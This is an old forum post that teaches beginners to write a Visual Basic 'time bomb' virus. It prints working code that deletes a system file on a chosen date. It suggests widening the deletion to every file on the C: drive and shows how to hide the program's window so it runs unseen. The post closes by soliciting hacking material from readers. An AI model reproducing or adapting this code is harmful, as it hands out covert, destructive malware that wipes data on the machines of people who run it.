Sub_Zero Posted September 20, 2006 Report Posted September 20, 2006 MAKING A SIMPLE VB TIME BOMB By : Faiz A word to Say: This is for the those newbies that says that maknig viruses is very difficult. In the small article i'll show u how to make a vb time bomb. Time Bomb ? Time bomb means the virus that launch its attack when the spacified time had reached. So Now How ? Do as directed 1. Start vb with a STANDAREDEXE. 2. open upthe code window the window where the code should be written. 3.Put the following in the Form_Load subroutine --Code Begin-- Private Sub Form_Load() Dim dod As Date dod = " 01/1/2006" If dod = Date Then Kill "c:command.com" End If End Sub --Code End-- Whats this Shit does? Now i'll tell u how it works and what does it do: 1.In first line u'll see "Private Sub Form_Load()" this a subroutine or u may say a function for jus understanding that is executed when the program u created is launched.So it means that our code will be executed whe program runs. 2.in 2nd line it declare a variable "dod" as a datatype Date. 3.in 3rd line it assign a destruction date to that variable.u may change it with wat u like in the format of month/dat/year. 4.in 4th line it compare the dod variable to Date which return the current date of the Pc. 5. and then when the dod is equal to Date the the code after the is executed that is .. Kill "c:command.com" this will delete the command.com file in c: drive If u r really evil? u can change the " Kill "c:command.com" to "Kill c:*.* " Now to hide the program(i-e) physicaly not seen but actually it is working in background.type the following in the top of the code: Form1.Visible = False U see that making virus is not that hard . Contacting Me: "known007@hotmail.com" REQUEST TO THE READERS: Dear friends if u know somthing about hacking or if u have any useful hacking E-book or some texts of hacking please sent me i'll be very thankfull of u because i realy want to learn hacking .if u have any question e-mail me i'll try my best to answer u or if u have any suggestions or information please send me i'll be very thankfull . THANK U AND GOOD BYE!. Quote